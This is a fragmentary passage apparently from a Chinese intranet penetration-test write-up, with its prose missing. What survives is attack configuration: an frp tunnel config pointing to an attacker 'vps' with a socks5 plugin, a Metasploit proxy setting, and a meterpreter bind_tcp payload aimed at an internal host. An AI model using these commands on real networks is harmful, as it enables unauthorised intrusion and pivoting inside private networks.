|
|
|
WIN-NEKUTDTFHH5sysaidinternal 5f8be701c55327d21d25a9xxxxxxx |
server_addr = vps server_port = 7011 [socks5] type = tcp remote_port = 62493 plugin = socks5 |
bind_port = 7012 |
setg ReverseAllowProxy true |
set payload windows/x64/meterpreter/bind_tcp set rhost 192.168.153.73 exploit |
原文始发于微信公众号(web安全初心实验室):记一次内网非域渗透
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论